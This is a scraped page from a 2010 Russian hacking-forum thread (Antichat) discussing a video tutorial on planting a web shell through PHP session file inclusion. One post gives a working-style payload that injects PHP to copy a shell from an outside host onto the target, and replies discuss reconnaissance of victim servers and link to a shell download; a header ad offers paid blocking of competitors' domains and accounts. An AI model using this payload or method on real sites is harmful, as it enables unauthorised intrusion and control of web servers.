Форум АНТИЧАТ - Заливаем шелл через инклуд сессии

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz

		Форум АНТИЧАТ > Antichat > Video.Antichat
Заливаем шелл через инклуд сессии

Страница 2 из 3

Опции темы

Поиск в этой теме

Опции просмотра

#11

05.02.2010, 14:36

$ereg@

Познающий

Регистрация: 21.08.2008

Сообщений: 85

Провел на форуме:
298650

Репутация: 15

Отправить сообщение для $ereg@ с помощью ICQ

согласен. поучительное видео... ток реально чёт долго ты всё делал...

#12

07.02.2010, 00:41

~~scorpic393~~

Banned

Регистрация: 05.02.2010

Сообщений: 70

Провел на форуме:
177258

Репутация: 5

Цитата:

Сообщение от .Slip

Сделай видео как подбирать поля в скуле длительностью 30 минут, для тех кто не знает.

ахах,жжощ.

п.с. за видео +, т.к. аналогичного не видел

#13

27.02.2010, 11:31

попугай

Познавший АНТИЧАТ

Регистрация: 15.01.2008

Сообщений: 1,166

Провел на форуме:
2459557

Репутация: 606

Даа жесть. Видео, конечно, интересное

Но. Полчаса лить шелл, это что-то. На середине видео я уже еле сдерживался, чтоб не закрыть плеер и не пойти критиковать

Во-первых, зачем ты в опере смотришь куки ТАКИМ образом? Это дико тормозно и медленно, проще жать ПКМ -> настройки для сайта -> Cookie (таким образом, опера не читают куки всех доменов, а только домена, на котором ты находишься сейчас.)

Во-вторых, magic quotes on там - но в скрипте скорей всего просто stripslashes делается, так что ничего странного нет.

В-третьих, зачем вводить cmd переменную? Тем более проверять ее существование isset-ом (ты же не будешь сначала пустой запрос слать, а сразу с кодом твоим). Эта переменная не нужна там совершенно, можно было банально сделать:

Цитата:

sess_[номер сессии]%00<?php copy('http://server.com/shell.txt', '../media/z.php');?>

И по этой причине html-форму какую-то выдумывать и через нее аплоадить шелл не пришлось бы.

phpinfo и абсолютный путь смотреть тоже, в принципе не обязательно было.

#14

27.02.2010, 15:35

Pashkela

Динозавр

Регистрация: 10.01.2008

Сообщений: 2,841

Провел на форуме:
9220514

Репутация: 3338

Отправить сообщение для Pashkela с помощью ICQ

Цитата:

Но. Полчаса лить шелл, это что-то. На середине видео я уже еле сдерживался, чтоб не закрыть плеер и не пойти критиковат

носит учебный характер, разжевывалось каждое движение

Цитата:

Во-первых, зачем ты в опере смотришь куки ТАКИМ образом? Это дико тормозно и медленно, проще жать ПКМ -> настройки для сайта -> Cookie (таким образом, опера не читают куки всех доменов, а только домена, на котором ты находишься сейчас.)

согласен

Цитата:

Во-вторых, magic quotes on там - но в скрипте скорей всего просто stripslashes делается, так что ничего странного нет.

Не обязательно, просто так же в скрипте можно отключить маджики или через .htaccess в данной конкретной папке

Цитата:

В-третьих, зачем вводить cmd переменную? Тем более проверять ее существование isset-ом (ты же не будешь сначала пустой запрос слать, а сразу с кодом твоим). Эта переменная не нужна там совершенно, можно было банально сделать:

Цитата:
sess_[номер сессии]%00<?php copy('http://server.com/shell.txt', '../media/z.php');?>

И по этой причине html-форму какую-то выдумывать и через нее аплоадить шелл не пришлось бы.

1. Зависишь от alloq_url_fopen=ON
2. Зависишь от magic_quotes=ON
3. Палишь домен
4. Зависишь от качества соединения со своим доменом - что лучше, загрузить со своего компа сразу или откуда-то?

Именно для это и продемонстрирован практически универсальный способ при фактически любых ограничениях

Цитата:

phpinfo и абсолютный путь смотреть тоже, в принципе не обязательно было.

Имхо, асболютно не соглашусь, прежде чем лечить, надо дать диагноз виктуму:

1. Просто проверяем, что php-код исполняется
2. Узнаем не только абсолютный путь, но и много другой важной и полезной информации (тот же allow_url_fopen=on, кхм + запрещенные функции и т.д.)

PS: Я не полчаса лил шелл, а полчаса снимал видео, как это можно сделать, с подробными объяснениями каждого шага, не рассчитано на опытных, хотя и некоторые из них, судя по посту выше, половины своих действий/бездействий просто не понимают

#15

02.03.2010, 03:35

Lilo

Moderator - Level 7

Регистрация: 10.03.2009

Сообщений: 1,013

Провел на форуме:
6183433

Репутация: 1521

мне понравилось.
спасибо

#16

02.03.2010, 12:35

zarkon

Постоянный

Регистрация: 22.11.2006

Сообщений: 473

Провел на форуме:
2461137

Репутация: 216

поддержу.. Видео гуд

#17

03.03.2010, 11:46

ihtr3

Новичок

Регистрация: 22.11.2008

Сообщений: 13

Провел на форуме:
40917

Репутация: -5

а где скачать шелл ?

#18

03.03.2010, 12:35

Coole_r

Познающий

Регистрация: 29.09.2009

Сообщений: 48

Провел на форуме:
812088

Репутация: 14

видео понравилось, спасибо тс

#19

03.03.2010, 14:33

Lilo

Moderator - Level 7

Регистрация: 10.03.2009

Сообщений: 1,013

Провел на форуме:
6183433

Репутация: 1521

Цитата:

Сообщение от ihtr3

а где скачать шелл ?

http://forum.antichat.ru/thread103155.html

#20

17.03.2010, 22:21

Bramin

Участник форума

Регистрация: 15.05.2009

Сообщений: 111

Провел на форуме:
1179199

Репутация: 127

Отправить сообщение для Bramin с помощью ICQ

Спасибо, хорошее видео. очень позновательно

Страница 2 из 3

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Читаем чужие письма на mail.ru через сессии	petrovich-lamer	E-Mail	30	12.05.2005 17:19
Залить шелл через подделку http запросов, на примере ipb 1.3	SURRENDER	Форумы	25	13.04.2005 15:37
Как залить шелл через PhPBB	SheFF	Форумы	5	29.11.2004 01:25
Как залить шелл через IPB форум, при отсутствии ftp?	bbmz	Форумы	1	26.11.2004 18:15

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход